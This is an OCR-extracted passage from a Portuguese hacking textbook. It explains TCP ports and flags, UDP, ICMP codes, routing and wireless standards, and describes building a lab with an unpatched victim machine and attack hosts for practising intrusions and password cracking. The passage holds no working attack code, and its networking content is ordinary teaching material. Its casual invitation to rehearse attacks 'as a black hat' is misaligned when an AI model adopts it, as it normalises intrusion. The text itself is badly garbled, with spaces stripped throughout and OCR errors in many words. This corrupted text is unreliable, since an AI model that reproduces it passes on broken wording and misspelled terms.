~Tamanhodajanela:1.920,emdecimal6.432.Éaquantidadedebytes
máximaqueaorigempodemanipular.
1Sim,provavelmente.hackerspodemalterarosnúmerosdasportas-destinodospacotesenviadospor
eleparafazercomqueossistemasdedefesapensemquesuamáquinaéuminocenteservidordeInternet
-edeixempassaroataque...
1168 1
RedesIII

Universidade2°Ano
~Verificador:c9b6.ÉochecksumdopacoteTCP.
~Ponteirodeurgência:0000.OprotocoloTCPpermitequecertosdados
dentrodopacotepossam"furaraftla"eserprocessadosprimeiro.AflagURG
indicaqueessesdadosexistem,eoponteiroindicaaposição,dentrodaárea
dedados,emquetaispacotesseencontram.Emnossopacote-exemplo,nãohá
nenhumdadourgenteaprocessar.
PortasTCP
Diz-sequeoTCPéumprotocoloorientadoaconexão.Issosignificaquenão
importaoscaminhospelosquaisopacoteIPande:paraoTCPnãoexiste"mun-
doláfora".OTCPcriaumcanalvirtualentreaorigemeodestino,eessecanal
éimuneainfluênciasexternas.Aalegoriadocanoéperfeita:oTCPcriaum
tuboentreaaplicaçãoorigemeadestino,eosdoislados"conversam"porele.
Quemolharporumaextremidadenãoverároteadores,cabos,IPs,Ethernet,
placasderede,nadadisso.Veráapenasseucompanheirodeconexãonooutro
lado.Essaconexãosóépossívelporqueexisteoconceitodeportas.
Vamosdivagarumpouco.Vocêjádeveteridoaalgumbarourestaurante
ondeacozinhaénoandardecimaeháelevadoresparaosdiferentestiposde
itensoferecidosnocardápio.Asbebidasnãopodemtrafegarnomesmoeleva-
dordospratosquentesporqueesquentarão.Estesnãodevemtrafegarnomes-
moambientedassaladas,porqueasdeixarãomurchasepossivelmente
engorduradas.Semfalarnassobremesas.Hipoteticamente,precisamosde,pelo
menos,quatroelevadores2.
Poroutrolado,todasasmesastêm,também,números.Sevocêconsiderarque
osgarçonssãoospacotesIP,ascomandaspodemservircomopacotesTCP.
Cadamesa"conecta-se"aumelevadorpormeiodacomanda/TCP.Amesa26
podeconectar-seaoelevador4eesperarumasobremesa;amesa31,aoeleva-
dor3eesperaraqueleEspagueteaoVôngoli.
Notequecadaumdoselevadoresdonossorestaurantepresta-seaumservi-
çodiferente.Seocasaldamesa4quiseroserviçocompleto,terádeseconectar,
emordem,aoselevadores1,2,3e4.Ocafezinhoéumexemplodeserviço
alternativoquevempelamesmaportadeoutro:desceupeloelevadordeso-
bremesas.Eacontavemporumaportadesconhecidaemisteriosa(nãosaiude
elevadornenhum),estouachandoqueéalgumbackdoor...
Voltandoaodomíniodoscomputadores,vocêpodeatribuirqualquerportaa
qualquerserviço.Masexistemsugestõesparaousodelas,todasreferenciadas
naRFC1700.Porexemplo,aporta80normalmenteédestinadaaosservidores
WebouHTTP.QuandovocêabreumapáginadaWebenãodizemqueporta
está,oseunavegadorinferequeéparausaraporta80.Vocêpodemontarum
servidorWebeatribuí-Ioàporta12345,sequiser.Masterádeinformaratodos
osseusclientesqueseuservidorusaessaporta.
2vocêjáviuumrestauranteorganizadoassim?Eununca.Minhasbebidaschegamsemprequentes...
1169I
]RedesII

IUniversidadeH4CK3RI
UmasessãoTCPseparececomesta:
PortaOrigem:2337
PortaDestino:80
PortaOrigem:80
PortaDestino:2337
Observe:aportadoclienteéoquechamamosdealtaounãoprivilegiada.
Elaémaiorque1024enormalmenteéfomecidapelosistemaoperacional,que
nãousaumaportaftxaparacadaaplicação,masapróximaportaqueestiver
disponível.Jáaportadoservidoréoquechamamosdebaixaouprioritária.
Essasportas,aocontráriodasdocliente,sãodeftnidaspeloIETFenormatizadas
pelaRFC1700.PensenosserviçosmaiscomunsquevocêusanaInternet:FTP,
SMTP,DNSeHTTP.Suasportas,segundoaRFC1700,são,respectivamente,21,
25,53e80.Dêumaolhadanalistacompletaemwww.ietf.org/rfc.htmI.
Háumamaneirafácildeverquaisportasestãosendousadas.Ocomando
netstat,presentetantonoWindowscomoemtodososUnix,mostratodosos
aspectosdoestadodaconexãodocomputadorcomarede.Emitirocomando
semargumentosvaimostrartodasasconexõesativas(vouusarumexemplo
doWindows,destavez,paranãomechamaremderadical):
C:\>NETSTAT
Conexões ativas
Endereço externo Estado
192.168.1.109 :netbios-ssn ESTABLISHED
baym-cs41.mdc.chachucha.com:1863 ESTABLISHED
streamer013 .cache.gotorama. com:http CLOSE_WAIT
xuxu. c1ient. tatibi tati.com:ftp TIME_WAIT
ADSL145-4.babababa.com.ar:1346 ESTABLISHED
Experimenteagoracomasopções-na.Aopçãondizaonetstatparanão
resolverosnomesdossiteseserviços,mostrando-oscomonúmeroIPede
portas.Observeacolunaendereçolocal.Asmilhareslogoapósosinalde":"
sãoasportaspelasquaisosaplicativos-clienteestão"escutando"econversan-
docomosservidores.Jánosendereçosexternos,notequeháserviçossendo
disponibilizadosporportasprivilegiadas:netbios-ssn(139),http(80)eftp(21).
Asoutrasduasestão"escutando"emportasaltas.
Comoveremosnoscapítulosseguintes,saberquaisportasestãoativasem
nossocomputadoréprimordialparaqueidentillquemospossíveisatividades
dehackersmaliciosos.Poroutrolado,conhecerasportascomunseasferra-
mentasqueasgerenciampodefacilitarascoisasparaessesmesmoshackers.
1170
I
Redes11[
Prato Endereço local
TCP
EST202:1928
TCP EST202:2787
TCP EST202:2934
TCP EST202:4065
TCP EST202:4068

Universidade2°Ano
05bitsde controleTCP
Paraamaioriadasaplicações,osbitsdecontroledoprotocoloTCPsãouma
partesignificativadotrabalhodeconexãoetransporte.Cadaumdosseisbits
presentesnocampoFlagsdopacoteIPtemumafunçãoespecíficaeimportan-
tenoestabelecimento,controleegerenciamentodasessão.Nocapítulo2,Re-
desI,nosreferimosaelesdeformarápida:
Quasetodasastécnicasdeportscanningvalem-sedossinais(ouflags)TCp,
UDPouICMPtrocadosentreosprogramasquequeremseconectar.Apenas
parareferênciarápida,ossinaissãoestes,naordemcomoaparecemnosflags:
~URG(urgent)-Sina1izadordeurgência;
~ACK(acknowledge)
-Indicaqueospacotesanterioresforamaceitosnodestino;
~PSH(Push)
-Umtipode"válvuladedescarga",aceleraatransmissãoparapoderfinalizá-Ia;
~RST(reset)-Interrompeaconexão,devidoaerrosou"quedadelinha";
~SYN(synchronize)
-Tentativadesincronizaçãoentreportas;
~FIN(finish)
-Finalizadordeconexão,usadonofimdatransmissão(nãohámaisdados);
Semosflagsdecontrole,nenhumaconexãopodeserestabelecidaoumantida.
Paraisso,oprotocoloTCP-IPseutilizadeumhandshakebásicodetrêsetapas,
queabreasessãodecomunicaçãoesincronizaentreasduasportasosnúme-
rosseqüenciaisdospacotesTCP.Observe:
SYN+SEOc
ACK+SEOceSYN+SEOs"
ACK+SEOc
Vamosusaroexemplomaismanjadodetodos:umservidorWeb.Ocomputa-
dorclientedesejaconectar-seaoservidoreobterdeleapáginaprincipal
index.php.OclienteenviaumpacoteTCPaoservidorparaaporta80como
flagSYNativadoecomumnúmeroseqüencialquemarcaráoiníciodatroca
dedados.Todosospacotesquesaemdoclienteemdireçãoaoservidorserão
seqüênciasemrelaçãoaesseprimeiro,quevamosabreviarparaSEQcOservi-
dor(seestiverescutandonaquelaporta)vairespondercomdoisflagsativados:
oACK,indicandoquereconheceueaceitouopacoteenviado,eumnovoSYN,
solicitandoqueoclienteaceiteoseunúmeroseqüenciaI(vamoschamá-Iode
SEQs)'Ocamponúmerodereconhecimentoquevaiemdireçãoaoclientepos-
suioSEQce,nocamponúmeroseqüenciaI,SEQs'Ocliente,então,responde
comumACK+SEQs'indicandoqueelespodeminiciaratransferênciadeda-
dossemproblemas.
1171I
]Redes11

IUniversidadeH4CK3RI
Comoambasaspartessabemqualéonúmeroseqüencialdooutro,ficafácil
pediroreenviodepacotesperdidoseordenarospacotesnodestino.Nãoé
nemumpoucoprovávelqueaquelesdesorganizados,desordeirosedescara-
dospacotesIPtenhamresolvidopassearporlugaresdiferentesdaInternete
chegaramnodestinoemumaordemdiferentedaestipulada.
Oqueacontecequandovocê,nomeiodocarregamentodapágina,dicano
botãoParardoseunavegador?Nestemomento,osoftwareemquestãomanda
umpacoteTCPparaoservidorcomoflagFINligado,comoquemdiz"pode
pararquenãoqueromaisbrincar".ObitRSTéusadoparaderrubarconexões
problemáticas,negartentativasnãoautorizadasouincompletasdeconexão
(porexemplo,aumaportaquenãoexiste)eliberaraportaemquestão,se
estiveremuso.
EstaéapartemaisimportantedenossosestudossobreoprotocoloTCP/lp.
OshackersusampesadamenteosflagsTCPparavasculharnossasconexõese,
dependendodasrespostasqueosistemaoperacionalretorna,calculaouinfere
seaportaestáabertaoufechada,seexisteproteçãoporfirewallounãoese
algumasvulnerabilidadesdetectáveisporesseprocessoestãopresentes.
ProtocoloUDP
OTCPé"carneeunha"comoIp,ejuntoselessão"paupratodaobra".A
maioriadosserviçosoferecidosnaInternetbaseia-senessadupladinâmica
(puxa,quetrocadilhoruim...).Masháumoutroprotocoloquepodeserconsi-
deradoo"amigãodopeito"doIP.
Hásituaçõesemquetodaaparafernáliadeverificaçõeslevadasacabopelo
TCPnãosãonecessárias.Namaioriadessassituações,elasatéatrapalham.
QuandobaixamosumprogramadaInternetouumamúsicapeloKaZaA(sem
pirataria,pessoa!!),queremosqueelesestejamíntegros,deoutromodonão
conseguiremosutilizá-Ios.Masquandoestamosouvindorádioouvídeopela
Internet,aordemdospacotesemesmosuaconfiabilidadejánãosãoassimtão
necessárias.
ÉnessecontextoqueentraemcenaoUserDatagramProtocol.Comoopró-
prionomediz,oUDPéumdatagramaconfigurávelpelousuário.Seucabeça-
lhoémuitosimples,ecabeaopróprioprogramadefinirasregrasdeconexão
easinformaçõesaseremtrocadasentreaspartes.Aexpressãonãoconfiávelé
normalmenteusadaparadescrevê-Io,pornãopossuirformasderecuperação
deerros,masissoéumamentira.OUDPserveparainúmeroscasosondeas
opçõesdeestabilidadedoTCPaindasãoinsuficientesedevem,portanto,ser
implementadasdiretamentenaaplicação.
OpacoteUDPnãopossuinenhumdoscamposdecontrole,seqüênciaereco-
nhecimento,nadadisso.Comonãoépossívelestabelecerumaconexãocomo
TCp'poisnãohámeiosdefazerohadshake,dizemosqueoprotocolo
11721
Redes11r

Universidade2°Ano
UDPnãoéorientadoa
conexão.Ou,usandoojargãoanglo-informatiquês, eleé
connectionless.
Voltandoaonossostreamming,umpacoteUDPfaltandosignificaumaman-
chinhaqualquernaminhaimagememstreamming,quepassadespercebida
pelarapidezcomqueoutraimagemécolocadanolugar.Jáoatrasoprovocado
portodasasverificaçõesdopacoteTCPtornariamovídeoextremamente de-
sagradáveldeassistir.UmpacoteUDPparece-secomeste:
Vê-sequeopacoteUDPéavaroemrecursosderede.Seucabeçalhotem
apenas
8bytes,emrelaçãoaoTCPquetem20oumais.
ProtocoloICMP
opessoalquedesenvolveuafamíliadeprotocolosTCP/IPnãodeupontosem
nó.Umadascoisasmaisbacanasparaocontroleesinalizaçãodeeventosepro-
blemasnasredesIPéotaldoInternetControlMessageProtocol.Suafunçãoé
enviarcomandossimplesainterfacesderedeeroteadoresparaqueelesfaçam
algumacoisaourespondamcomseuestado.Alémdeserusadoautomaticamete
pelasinterfaceseroteadores,éumacaixadeferramentasmuitointeressante
paraoadministradorresolverproblemasdarede.Hackerstambémadoramos
recursosqueoICMPofereceparadescobriratopologiadenossarede...
OICMPéumprotocolodenível3(ups,deveríamostê-Iocolocadoantesdo
TCp,nãoacha?Bem,achamosque,didaticamente,eleficariamelhoraqui).O
cabeçalhodoICMPéliteralmenteomesmodoIp,masnocampodeprotoco-
los,emvezdo6doTCPouo17doUDp,colocamos1.Nocampodedadosdo
pacoteIPéinseridomaisumcampodecontrole,ochamadoICMPTypeField,
queidentificaotipodemensagemqueoICMPvaitransportar.Essescódigos
tambémestãodefinidospeloIETFna(adivinhe...)RFC1700emostradosna
tabelaaseguir:
11731
]RedesII
PortaUDPdeOrigem(16)
T PortaUDPdeDestino(16)
Tamanhodosdados(16)
T Checksum(16)
Dados

IUniversidadeH4CK3RI
~OEchoReply[RFC792]
~1UnassignedUBP]
~2UnassignedUBP]
~3DestinationUnreachable[RFC792]
~4SourceQuench[RFC792]
~5Redirect[RFC792]
~6AlternateHostAddressUBP]
~7UnassignedUBP]
~8Echo[RFC792]
~9RouterAdvertisement[RFC1256]
~10RouterSe1ection[RFC1256]
~11TimeExceeded[RFC792]
~12ParameterProblem[RFC792]
~13Timestamp[RFC792]
~14TimestampReply[RFC792]
~15InformationRequest[RFC792]
~16InformationReply[RFC792]
~17AddressMaskRequest[RFC950]
~18AddressMaskReply[RFC950]
~19Reserved(forSecurity)[Solo]
~20-29Reserved(forRobustnessExperiment)[ZSu]
~30Traceroute[RFC1393]
~31DatagramConversionError[RFC1475]
~32MobileHostRedirect[DavidJohnson]
~33IPv6Where-Are-You[BillSimpson]
~34IPv6I-Am-Here[BillSimpson]
~35MobileRegistrationRequest[BillSimpson]
~36MobileRegistrationReply[BillSimpson]
~37-255ReservedUBP]
OstiposdemensagensICMPestãolistadosnoformato:
~ValorMensagem[Referência].
Algunsdostiposdemensagemprecisamdeparâmetrosparafuncionar.
Outros,devolvemvaloresqueinformamoestadodostestesrealizados.Ocampo
emqueessesvaloressãoguardados,logoapósoServiceType,échamadodeCode
Byte.Algunsvaloresparacodebytesimportantessão:
11741
Redes11I

Universidade2°Ano
3DestinationUnreachable [RFC792]
Codes
ONetUnreachable
1HostUnreachable
2ProtocolUnreachable
3PortUnreachable
4FragmentationNeededandDon'tFragmentwasSet
5SourceRouteFailed
6DestinationNetworkUnknown
7DestinationHostUnknown
8SourceHostIsolated
9CommunicationwithDestinationNetworkis
AdministrativelyProhibited
10CommunicationwithDestinationHostis
AdministrativelyProhibited
11DestinationNetworkUnreachableforTypeofService
12DestinationHostUnreachableforTypeofService
5Redirect [RFC792]
Codes
ORedirectDatagramfortheNetwork(orsubnet)
1RedirectDatagramfortheHost
2RedirectDatagramfortheTypeofSerViceandNetwork
3RedirectDatagramfortheTypeofServiceandHost
11TimeExceeded [RFC792]
Codes
OTimetoLiveexceededinTransit
1FragmentReassemblyTimeExceeded
12ParameterProblem [RFC792]
Codes
OPointerindicatestheerror
1MissingaRequiredOption
2BadLength
[RFC1108]
ProcureasRFCsindicadaseestudeosignificadodecadaumdossinaise
códigos.Valeapena!
11751
IRedesII

IUniversidadeH4CK3R I
LaboratóriodeRedes11
NocapítuloRedesIdtamososequipamentosutilizadosparaamontagemdeuma
redesimplescomdoiscomputadores,usandoumcabodeconexãocruzada,nor-
malmenteapelidadode"cabocross".NossofOcoprindpa1eraamontagemdeuma
rededoméstica,semousodeequipamentosmaiscomplexoscomooshubs,bridges,
switcheseroteadores,emboratenhamosvistoalgumasdefiniçõesdessesaparelhos.
Paraarealizaçãodemuitasdasexperiênciassugeridasnoscapítulosaseguir,te-
mosdeprepararumarededetestesumpoucomaiselaborada.Eladeveser,obvia-
mente,isoladadesuarededeproduçãomasdeveteralgumaligaçãocomaInternet.
Asvantagensdeterumambientecontroladoparafazerseustestessãoóbvias:
~Nãoháperigodedanificarmáquinasdeproduçãooudeusofreqüente;
~Damesmaforma,suaredecorporativaestarásegura;
~Pode-se"brincar"àvontadecomasferramentaseexploitsmostrados;
~Sevocêquiserserumblackhat,épossíveltestarosataquesantes;
~Montarumapequenaredepodeserumaexcelentehigienemental;
~SerápossívelfazercampeonatosdeDoomdepoisdo"horáriodeaula";-).
Ohardwarenecessárioébaratíssimo.PelomenostrêsmáquinasPentium
133ousuperior,com64MBdeRAMe4GBdeespaçoemdiscodevemservir.
MáquinasquerodarãosistemasUnixparaPCprecisamdemenospoderainda
-velhos486oumesmo386devemservirmagistralmente.Cadaumadasmá-
quinasdeveráteralgumaplacaderedebarata,masquesejacompatívelcom
todosossistemasoperacionaisquevamosusar.Essasmáquinaspodemser
encontradasusadaspormenosdeR$200cadanos"sucatões"deinformática
existentesempraticamentetodooBrasil.Observequenemtodasasmáquinas
precisampossuirmonitores.
Paraarede,umhubtambémusadoebaratodeveservir.Comoodesempenho
nãoseráproblemaaqui(muitopelocontrário,quantomaislentaarede,me-
lhoratrocademensagenspoderáseravaliada),qualquerhub,mesmopassivo,
serviráperfeitamente.Retalhosdecabosdepartrançadocategoria5oumes-
mo3poderãoserencontradosnolixodasempresasoucompradosbaratinho
nasmesmaslojasdesucata.
Todoessehardwareligadoemredemerecebonssistemasoperacionaispara
trabalhar.Guardesuamáquinamaisparrudaeinstalenelaváriasversõesdo
Windows,emmultiboot:98SE,Me,2000eXPsãoexcelentespedidas.Aplique
nelatodososhotI1XeseServicePacksdisponíveis.Essamáquinaseráusada
paraoriginarataquespormeiodeferramentasWindowseparasofrerataques
destinadosamáquinasatualizadasdessasplataformas.
Naoutramáquina,instaleumWindowsNT4,umOpenBSD,umFreeBSD4.5
eumLinuxcomopçãodekemel2.2e2.4.Nãoinstalenenhumservicepackou
atualizaçãonela.Essaseráa"coitada".
11761
Redes11[

Universidade2°Ano
Namáquinamaisfraquinha,instaleasversõesmaisatualizadaspossíveisdo
Linuxcomkernel2.4eOpenBSD.SerásuaorigemdeataquesUnix.OsUnix
enxutosparaPCsedãobememmáquinasantigas.
Porúltimo,vamosestabelecerumaconexãocomaInternet.Umanão,quatro.
Precisamosconfigurarasduasmáquinassegurascomogatewaysdeumacone-
xãodealtavelocidade,portantoambasterãoduasplacasderede.Oroteador
deacessorápidopoderáser"plugado"namáquinaquedeveráproveroacesso
paraaqueleteste.
ComovamosbrincardeWarDialers,precisamostambémdemodemsde
linhadiscada.Cadacomputadordeveráteroseu.Odiagramadestaredeum
poucocomplicadaficariaassim:
Windows Coitada
BarramentodoHub
Omaterialnecessárioé,então:
-3computadoresPentium133ou486
commemóriaediscoapropriados;
-2modemsdiscados;
-5placasderede;
-1hublOBaseTbarato;
-CabosUTPcat3oumelhor;
-Sistemasoperacionaisindicados.
Linha
Telefonica
Unix
Seforemusadoscaboseplacascoaxiais,serápossíveldescartarohub,masa
redenãoserámaisfacilmenteexpansível.Issoéinteressantepois,nofuturo,
pode-semontarumclustercomdiversos386adquiridosnolixãoeque,juntos,
formamumsupercomputadorrespeitávelparaquebrarsenhas.
Comobônus,nofimdestecapítulorecolhemosalgumasinformaçõessobre
tecnologiasdeInternetquepodemserdeinteresse.Éapenasumareferência
rápida:háliteraturamaiselaboradadisponívelnaInterneteembonslivros.
11771
]RedesII

IUniversidadeH4CK3R I
Roteamento
Paraqueoroteadorpossadirecionarosdadospelosdiferentescaminhos
entreasredesinterligadas,elesutilizamoschamadosProtocolosde
Roteamento.Alémdisso,osdispositivostambémvêmdotadosdeumatabe-
laderoteamento,responsávelporidentificarasrotasqueserãoseguidas
pordatagramas.Casooroteadornãoconheçaocaminhopeloqualo
datagramadevepassar,eleoenviaparaumroteadorlistadocomodefault
gateway(caminhopadrão)paradeláprosseguirseucaminho.
Oprotocoloderoteamentoagededuasformas,informandoomenor
caminho,oquenãosignificaqueessesejaomelhor,ouentãoinformando
omelhor,quenemsempreéomenor.Grandepartedasvezes,omelhor
caminhoéomenoscongestionado,umavezqueosmenorespodemestar
lidandocommuitasrequisiçõesaomesmotempo.Dentreosprotocolos
deroteamento,ficaremoscomosligadosaoTCP/IP,queéomaisutiliza-
do,falaremosdoOSPF(OpenShortestPathFirst)edoRIP(Routing
InformationProtocol).
OSPF
OOSPFéumprotocoloabertoqueébaseadonolinkutilizadopeloTCP/lP.
Eleécapazdetestaroestadodosoutrosroteadoresconectadospormeiode
umamensagemchamada"hello",queéenviadaparacadaum,eseoroteador
contatadoestiverfuncionandoeleretomaumamensagempositiva;afaltade
respostasignificaqueoequipamentoestáforadoar.Alémdisso,tambémpos-
suioroteamentobaseadonotipodeserviço,queescolheamelhorrotaparao
datagramabaseadonaprioridadedodatagramaemquestão.
OcabeçalhoOSPFéformadopor:
Versão
-Versãodoprotocolo;
Tipo
-Tipodamensagemquepodeser:hello,descriçãodobancodedados,
pedidodoestadodolink,atualizaçãodoestadodolink,conftrmaçãodoestado
dolink;
IPdoroteadordeorigem
-InformaoendereçoIPdoroteadorqueestá
enviandoamensagem;
Área
-Atéemqueáreaamensagemserefere(noOSPFasredespodemser
divididasemáreas);
Checksum:Checksumdamensagem;
Tipodeautenticação
-Informaçõessobreasenha;
Autenticação
-Casohajasenha.
RIP
ORIPfazcomqueosroteadoresenviemsuastabelasderoteamentode30
em30segundosparaosoutrosroteadores,fazendodessaformaumaatualiza-
1178I
Redes11r

Universidade2°Ano
çãoconstantedesuastabelasbaseadonasdeoutrosroteadores.Umdosmaio-
resproblemasencontradosnesseprotocoloéqueeledefmeocaminhoaser
percorridobaseadonadistânciaatéoreceptor,semlevaremcontaascondi-
çõesedesempenhodarotaaserpercorrida.
AsmensagensRIPpossuemosseguinteselementos:
Comando
-Usadoparaidentificarseamensageméumpedidoouuma
resposta;
Versão
-Informaaversãodoprotocolo;
Reservado
-Hádiversoscamposmarcadoscomoreservados,etodoseles
sãopreenchidoscomzeros;
Protocolo
-Informaqualfoioprotocoloutilizadoparageraro
endereçamento; .
EndereçoIP -DizqualoIPdaredecujadistânciaestásendoinformada
atravésdamensagem;
Distância-InformaadistânciaatéaredenocampodoendereçoIP.
Internet
Em1969,nasciaaInternet.Essapodeserconsideradaumadashistóriasmais
contadasnomundodigital,masnuncaédemaisrelembraraorigemdeumdos
grandesfrutosdahumanidade.Aintençãoeraligaroslaboratóriosdepesquisa
norte-americanosdaARPA(AdvancedResearchProjectsAgency),visandoàes-
tabilidadedetodoosistemacasoalgoacontecesseaumdosseusterminais.
Podemosdizerentãoquemaisumavançodahumanidadenasceuligadoàs
intençõesmilitares,tudoporcausadaguerrafria.
Aospoucos,aredefoiseexpandindoparauniversidadeselaboratórios,e
comotempoacabouganhandoomundo.Nãoexisteumlugarcentralondea
Internetestejalocalizada,sãomaisde40milredesespalhadasaoredordo
globo,todaselasbaseadasnoprotocoloTCP/lP.Nãofoiàtoaqueelesetomou
tãopopular,comodissemosantes.
ARedeMundialdecomputadores,tambémchamadadeWWW(WorldWideWeb),
éformadaporredesdealtacapacidade,queporsuavezestãoconectadasacompu-
tadorespoderososconhecidoscomoBackbones,comaltalarguradebanda.
DiscutiroscomponentesdaInternetseriacomodiscutiropróprioprotoco-
loTCP1IP,ejáqueoestudamosnocapítuloRedesI,aconselhamosoleitoradar
umaolhadaemtermoscomoFTp'HTTP,DNS,entreoutrosqueláestãodescri-
tos.EssessãoostermosmaisusadosnagrandeRede.
Sub-Redes
UmaredebaseadaemTCP/lPpodeserdivididaemredesmenoresparaque
hajaapossibilidadedecriardomíniosdedifusãomenores,eassimutilizar
melhorosrecursosdisponíveis.Elassãoconhecidascomosub-redesouredes
1179I
]
Redes11

IUniversidadeH4CK3R I
segmentadas.EssasredesseutilizamapenasdeumroteadorIP.Sendoassim,
cadasubpossuiapenasumaidentificação.AredeteriaumnúmeroftxodeIP,
como192.168.10.0,etodasasmáquinascompreendidasdentrodelateriam
IPsbaseadosnessenúmero,porexemplo:
IPdarede:192.168.10.0
IPsintemos:192.168.10.1,192.168.10.2,192.168.10.3...
Alémdisso,asmáscarasdesub-redeforamcriadasparaauxiliarnaidentifica-
çãodasmáquinasnarede.Vocêpodeencontrarmaisinformaçõessobreelas
nocapítulodeRedesI,emTCP1IP.
RedesWireless
Rádio
Sistemautilizadoprimordialmenteemredespúblicas,dadaafaltadeseguran-
çaemsuastransmissões.Énecessárioqueantenasestejaminstaladasdentrodo
alcancedetransmissão,masnadaimpedealguém(hackers,talvez)deinstalar
umaantenaparaacaptaçãodessesdados,que,senãoestiveremcriptografados
adequadamente,poderãoserutilizadosparaoutrosfmsquenãoosesperados.
Umadesuasgrandesvantagenséquesuaoperaçãoéfeitanafreqüênciade
2,4GHz,consideradadeusopúblico,edessaformanãohánecessidadede
autorizaçãodeórgãosgovernamentaisparasuautilização.
Umaoutraformadetransmissãodedadosporrádioéconhecidacomotrans-
missãodirecional.Elaéfeitapormeiodeantenasparabólicas,masestasdevem
estarbemalinhadas,poisqualquerobstáculooudesviopodecomprometer
seriamenteaconexão.
IEEE802.11
Foiopadrãocriadoparasanaroproblemadafaltadepadronizaçãoexisten-
teentreosfabricantesdetecnologiaderádio,poisnãohaviacompatibilidade
entreosdiferentesprodutos,impedindoassimacomunicaçãoentreasredes.
EleutilizaumesquemaconhecidocomoCarrierSenseMultipleAccesswith
CollisionAvoidance(CSMNCA).Otransmissorfazumtesteinicialelogoem
seguidasincronizaasmáquinasparaquenãohajaconflitosoucolisõesna
transmissãodosdados.
InfravermeLho
Autilizaçãodoinfraverme1hqparaacomunicaçãosemftotemsuaaplicação
voltadamaispararedeslocais.'Seualcanceestárestritoaumambientepeque-
noetotalmentesemobstáculos,poisoespectrodeluznãopodeatravessá-Ios.
1180
I
Redes11[

Universidade2°Ano
Bluetooth
oBluetoothéconsideradocomoumaredesemfiodebaixocusto,masque
infelizmentepossuibaixoalcance.Suapropagaçãoéfeitaapartirdesinaisde
rádiodealtafreqüênciaesuaversatilidadepermiteaconexãodeváriosapare-
lhosquevãodesdeeletrodomésticosatélaptops.Essatecnologiafoicriadaa
partirdainiciativadaEricssonMobileCommunication,em1994,paraexplo-
raracapacidadedainterfacederádioemseusaparelhos.Em1998nasceuo
SIG(BluetoothSpecialInterestGroup).Osistemautilizaumafreqüênciade
até2,4GHz,comumataxadetransmissãodeaproximadamente1Mbps,com
distânciamáximadedezmetros.
GSM
OGlobalSystemforMobileCommunicationséumpadrãoparatelefoniade
arquiteturaabertamóvelutilizadonaEuropaequejáestáseespalhandopelo
mundo.Eleoperanafreqüênciade900MHz,especificadapeloEuropean
TelecommunicationsStandardsInstitute(ETSI).Atualmente,atecnologiaem-
pregadajáestánasuaterceirageração,aqualveremosaseguir:
2,56
Nívelintermediárioentrea2Gea3G,permiteaconexãodebandalargacom
celularesePDAs.Alémdisso,ofereceumagamadeserviçosquetornaramesta
tecnologiamuitomaisatrativa,comomensagensdetextoinstantâneaseservi-
çosdelocalização.
36
TerceirageraçãodatecnologiaGSM.Suasaplicaçõesestãovoltadasparao
acessodiretoàInternetcombandalarga,transformandoassimotelefonemó-
velemumaplataformacompletaparaaobtençãodedadoseserviçosna
Internet;alémdisso,háestudossobresuautilizaçãoparacomérciomóvel.Isso
significaefetuarcomprasemmáquinasautomáticaselojasutilizandooapare-
lhocelular.Podeoperaremfreqüênciasde1,9GHza2,1GHz.
WiFi
WiFiéaabreviaturaparaotermoWirelessFidelity,daWECA(Wireless
EthernetCompatibilityAlliance),queutilizaoprotocoloconhecidocomoIEEE
802.11b.
1181I
]RedesI1

Vulnerabilidades
Capítulo
'Vesgensesc/aves,chansons,chants&
requestes,CaptifsparPrinces,&
Seigneursauxprisons.A!advenirpar
idiotssanstestes,
Serontreceuspardivinsoraisons': i
Nostradamus,CentúriaI,14a
quadra,aprox.1555
1Dopovoescravizado,canções,cantoseperdidos/Cativosporpríncipes
elordesnasprisões:/Nofuturo,portaisidiotasacéfalos/Esses(perdidos)
serãotomadoscomooraçõesdivinas.

IUniversidadeH4CK3R I
Àmedidaqueevoluímosemnossosestudossobreasfraquezasdossistemas
deinformação,tomamo-nosmaisousadoseconfiantes.Estelivro,mimetizado
emcursosuperior,foiestruturadoparaquequalquerpessoacomconhecimen-
tobásicoeminformáticapudessechegaraentenderalgumacoisasobresegu-
rançaeredes.Porissomesmo,atéaqui,oleitorfoitratadoquasequecomoum
leigo.Paranão"ofender"osleitorescomconhecimentostécnicosmaisavança-
dos,colocamosnoCDtodasasmatériasquenormalmenteseriamconsideradas
pré-requisitoparaentendimentodoquerealmenteinteressa.Asmatériasconsi-
deradasdiretamenteligadascomhackerismo(invasão,engenhariasocial,etc.)
ficaramnolivroimpresso.Apartirdeagora,consideraremosqueosconceitos
estãoassimilados("matériadada")epassaremosatópicosmais"pesados".
Vejamosoquetemosatéagora.Falandodiretamentesobrehackerseinva-
sões,tivemososseguintescapítulos: .
CapítuloZero -AulaInaugural-Umaintroduçãoaoambientenormal-
mentechamadodehackerspaceoudigitalunderground.
Capítulo1-PsicologiaHacker-Umpoucodomododepensardosha-
bitantesdessemundo.
Capítulo5
-FundamentosJurídicos-Consideraçõeslegaissobre
informática
Capítulo6
-EngenhariaSocial-ObtendoinformaçõesANTESdeligaro
computador.
Capítulo7-VulnerabilidadesI -Agindocomoscriptkiddieseinvadin-
docomputadorespessoais.
Comtudooquevimosatéestecapítulo,podemosdizerquejánosigualamos
àgrandemultidãodescriptkiddiesespalhadospeloglobo.Oleitordeveter
notadoque,emvezdefalardedezenasdeferramentaseexplicarcomocada
umafunciona,tentamosmostraromodocomooskiddiestrabalhameoslocais
ondesepodeencontrartaisferramentas.
Novamenteadvertimos:nenhumlivro,CD-ROM,FAQousitenaInternetensi-
naráalguémaserhacker.Éumprocessoquerequerestudo,paciência,persis-
tênciaeabnegação.Nopresentecapítulo,veremosmaisalgumastécnicasusa-
daspelosscriptkiddies,destavezfocandositesnaInternetouredesesistemas
corporativos.Masaocontráriodoskiddies,vocêsaberáexatamenteoqueestá
fazendo,baseadonosconhecimentosadquiridosanteriormente.Outracoisaque
poderásernotada:ferramentasde"hacking"paraWindows9xsãomerosbrin-
quedos.Àmedidaqueascoisasvãoficandosérias,apenassistemasmaisparrudos
comooWindowsNTouoUnixpossuemcondiçõesdeservirdebasepara
ataques,especialmenteesteúltimo.
11841
Vulnerabilidades11[

Universidade2°Ano
Emcasodedúvida,recomendamosumareleituradoscapítulosanteriores,
incluindoaexecuçãodasexperiênciasmostradas.Oquê?Vocênãofeznenhu-
maexperiênciaprática?Ora!Parealeituradolivroporaquiésóvoltequando
terminaraliçãodecasa!
Navegandoanonimamente
OsproxiesfazemmaisdoqueserviremdefIrewallecachepararedesinter-
nasacessaremàInternet.UmcomputadoratrásdeumproxyfIcatotalmente
escondido,eseunúmeroIPnãoérevelado.Paraocomputadorquerecebea
